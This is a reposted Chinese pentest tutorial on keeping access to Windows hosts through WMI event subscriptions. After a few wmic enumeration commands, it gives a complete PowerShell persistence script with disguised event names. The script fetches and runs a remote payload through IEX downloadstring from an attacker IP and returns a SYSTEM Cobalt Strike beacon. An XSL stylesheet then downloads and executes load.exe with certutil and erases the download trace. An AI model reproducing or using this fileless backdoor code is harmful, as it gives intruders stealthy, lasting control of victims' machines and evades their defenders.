權限維持-wmi事件

本文轉載自查看原文 2019-06-02 21:32 553 內網滲透 web安全 web滲透 msf kali 端口轉發隧道代理/ web滲透滲透技巧奇淫巧技/ 后門維持

0x01 前言

WMIC擴展WMI（Windows Management Instrumentation，Windows管理工具），提供了從命令行接口和批命令腳本執行系統管理的支持。

在2015年的blackhat大會上Matt Graeber介紹了一種無文件后門就是用的wmi。

https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

WMI可以描述為一組管理Windows系統的方法和功能。我們可以把它當作API來與Windows系統進行相互交流。WMI在滲透測試中的價值在於它不需要下載和安裝，因為WMI是Windows系統自帶功能。而且整個運行過程都在計算機內存中發生，不會留下任何痕跡。

0x02 wmi常見使用

檢索系統信息

檢索系統已安裝的軟件

wmic product list brief |more

搜索系統運行服務

wmic service list brief |more

搜索啟動程序

wmic startup list brief |more

搜索計算機域控制器

wmic ntdomain list brief

0x03 wmi事件利用達到cs的beacon上線

如下是 WMI-Persistence.ps1 腳本,代碼非常簡單,三個函數分別是插入指定wmi事件,刪除指定wmi事件,然后查詢wmi事件,需要改的地方就一處,即加粗的遠程payload地址,

當然,事件名也可以改成自己想要的,不過即使不改也沒啥太大關系,一眼看不太出來

#

function Install-Persistence{


$Payload = "<strong>((new-object net.webclient).downloadstring('http://192.168.3.68:80/logo.gif'))</strong>"
$EventFilterName = 'Cleanup'
$EventConsumerName = 'DataCleanup'
$finalPayload = "<strong>powershell.exe -nop -c `"IEX $Payload`"</strong>"
 
# Create event filter
$EventFilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = $EventFilterName
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
    QueryLanguage = 'WQL'
}
 
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs
 
# Create CommandLineEventConsumer
$CommandLineConsumerArgs = @{
    Name = $EventConsumerName
    CommandLineTemplate = $finalPayload
}
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs
 
# Create FilterToConsumerBinding
$FilterToConsumerArgs = @{
    Filter = $Filter
    Consumer = $Consumer
}
$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs
 
#Confirm the Event Filter was created
$EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
if ($EventCheck -ne $null) {
    Write-Host "Event Filter $EventFilterName successfully written to host"
}
 
#Confirm the Event Consumer was created
$ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
if ($ConsumerCheck -ne $null) {
    Write-Host "Event Consumer $EventConsumerName successfully written to host"
}
 
#Confirm the FiltertoConsumer was created
$BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
if ($BindingCheck -ne $null){
    Write-Host "Filter To Consumer Binding successfully written to host"
}
}

function Remove-Persistence{ $EventFilterName = 'Cleanup' $EventConsumerName = 'DataCleanup'


# Clean up Code - Comment this code out when you are installing persistence otherwise it will
 
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
 
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
}

function Check-WMI{ Write-Host "Showing All Root Event Filters"Get-WmiObject -Namespace root/subscription -Class __EventFilter


Write-Host "Showing All CommandLine Event Consumers"
Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer
 
Write-Host "Showing All Filter to Consumer Bindings"
Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
}

然后開始插入事件,一旦正常插入成功后,當目標再次重啟系統,管理員[administrator]正常登錄,稍等片刻[2016可能要稍微多等會兒]當系統在后台輪詢到我們的payload事件后,便會被觸發執行

PS > Import-Module .\WMI-Persistence.ps1

PS > Install-Persistence

PS > Check-WMI

隨之,system權限的beacon被正常彈回

0x04 配合certutil 達到自定義上線

我們還可以使用wmi的遠程加載功能

wmi.xsl 實現的功能很明了,即 certutil下載者

<?xml version=``'1.0'``?>

<stylesheet

xmlns=``"http://www.w3.org/1999/XSL/Transform" xmlns:ms=``"urn:schemas-microsoft-com:xslt"

xmlns:user=``"placeholder"

version=``"1.0"``>

<output method=``"text"``/>

``<ms:script implements-prefix=``"user" language=``"JScript"``>

``<![CDATA[

``var r = ``new ActiveXObject(``"WScript.Shell"``).Run(``"cmd.exe /c certutil -urlcache -split -f <strong>http://*/load.jpg</strong> %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://*/load.jpg delete"``,0);

``]]> </ms:script>

</stylesheet>

修改WMI-Persistence.ps1 腳本,只需把payload部分換下就行,別的不需要動　　

wmic os get /FORMAT:"http://192.168.3.68:80/wmi.xsl"

powershell -exec bypass

PS > Import-Module .\WMI-Persistence.ps1

PS > Install-Persistence

PS > Check-WMI

PS > Remove-Persistence 用完以后務必要記得隨手刪掉

也可以達到自定義上線的目的。

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Windows單機權限維持 [ wmi事件 ] Windows權限維持 Window權限維持（三）：服務 [總結]Windows權限維持 MSF權限維持域權限維持-DSRM 內網滲透之權限維持 [總結]Linux權限維持滲透測試-權限維持權限維持專題：域控制器權限維持